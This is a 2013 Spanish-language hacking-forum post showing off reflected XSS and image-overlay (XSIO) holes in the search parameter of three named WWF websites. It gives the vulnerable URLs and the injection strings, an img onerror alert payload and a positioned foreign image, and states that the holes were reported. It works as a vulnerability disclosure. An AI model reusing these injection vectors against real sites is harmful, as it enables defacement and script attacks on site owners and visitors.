Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Hu0r en Febrero 21, 2013, 02:23:54 AM

Título: [XSS] & [XSIO] WWF
Publicado por: Hu0r en Febrero 21, 2013, 02:23:54 AM
Vulnerabilidades XSS y XSIO para varios dominios de WWF:

XSS

(http://i48.tinypic.com/119ph8m.png)
(http://i46.tinypic.com/2wce0ro.png)
(http://i50.tinypic.com/2v3izgm.png)

Urls:
- http://wwf.panda.org/index.cfm?uGlobalSearch=
- http://www.wwf.es/index.cfm?uGlobalSearch=
- http://www.wwfca.org/index.cfm?uGlobalSearch=
Vector: "><img src=x onerror=alert(/Hu0r/);>
Autor: Hu0r
Reportado: Si

XSIO

(http://i48.tinypic.com/2ug1nyx.png)
(http://i49.tinypic.com/mjwpe0.png)
(http://i47.tinypic.com/53wsqw.png)

Urls:
- http://wwf.panda.org/index.cfm?uGlobalSearch=
- http://www.wwf.es/index.cfm?uGlobalSearch=
- http://www.wwfca.org/index.cfm?uGlobalSearch=
Vector: "><img src='http://underc0de.org/foro/Themes/underc0de/images/theme/logo.png' style='position:absolute;left:500px;top:150px;'/>
Autor: Hu0r
Reportado: Si

Saludos!